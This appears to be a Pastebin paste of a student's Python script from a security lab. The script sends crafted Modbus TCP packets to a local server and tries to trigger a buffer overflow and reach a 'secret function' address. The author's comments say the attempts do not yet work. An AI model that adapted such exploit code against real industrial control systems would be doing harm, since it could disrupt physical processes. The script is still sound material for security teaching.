Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import socket
- import struct
- import time
- from binascii import *
- HOST = '127.0.0.1' # The remote host
- PORT = 1502 # The same port as used by the server
- sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Establish the connection
- sock.connect((HOST, PORT)) # Connect to the server
- BUFFER_SIZE=1000
- # Construct the malicious packet you want to send to the server
- # Please read about the structure of the modbus packets. You may need the following parameters: tid, pid, length, uid, fcode, write address
- # number of registers to write, read address, number of registers to read, and content of the registers to be written (payload)
- # Use struct.pack for constructing the packet
- # Construct request packet
- #test runs
- # m= struct.pack('>3H 2B 2H', 0, 0, 6, int(unitId), int(functionCode), int(startRegister), int(numRegister))
- # unitId = 16 #
- # functionCode = 17
- # coilId = 1
- # strFormat='>9H'
- # req = struct.pack(strFormat, 0,0,6, int(unitId), int(functionCode), 0x00, int(coilId), 0xff, 0x00)
- # unitId = 5
- # functionCode = 5
- # coilId = 256
- #rsuppoed to write outside the buffer zone :|
- # req = struct.pack('>9bH3B', 0x00, 0x00, 0x00, 0x00, 0x00, 0x07, int(unitId), int(functionCode), 0x00, coilId, 0xf1, 0xf1, 0x02)
- # sock.send(req)
- unitId = 5
- functionCode = 4
- startRegister = 255
- numRegister = 132
- #starting address of secret function : 0x08048f30
- # Construct request packet
- # supposed to do the overflow :(
- req = struct.pack('>3H 2B 2H', 0, 0, 6, int(unitId), int(functionCode), int(startRegister), int(numRegister))
- sock.send(req)
- # print(req)
- # print(struct.unpack(strFormat, req))
- # sock.send(req)
- # print("TX: (%s)" %req)
- # rec = sock.recv(BUFFER_SIZE)
- # print("RX: (%s)" %rec)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement